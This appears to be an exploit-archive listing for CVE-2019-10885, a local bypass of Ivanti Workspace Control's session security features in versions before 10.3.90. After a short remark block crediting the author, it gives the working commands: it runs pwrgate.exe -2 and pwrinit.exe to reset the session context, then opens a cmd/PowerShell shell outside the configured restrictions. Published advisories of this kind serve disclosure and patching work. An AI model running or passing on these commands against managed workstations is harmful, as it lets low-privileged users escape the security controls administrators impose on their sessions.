Ivanti Workspace Manager versions prior to 10.3.90 suffer from a bypass vulnerability.
d5a5d5763c494f264bad3c58327b4e873bfe30a582df25931163b631bce663ba
Rem Remarks CVE-2019-10885 - 0day <jsacco@exploitpack.com>
Rem An issue was discovered in Ivanti Workspace Control before
10.3.90.0. Local authenticated
Rem users with low privileges in a Workspace Control managed session
can bypass Workspace Control Rem security features configured for this
session by resetting the session context.
"%PROGRAMFILES(X86)%\RES Software\Workspace Manager\pwrgate.exe -2"
"%PROGRAMFILES(X86)%\RES Software\Workspace Manager\pwrinit.exe"
cmd.exe /k powershell.exe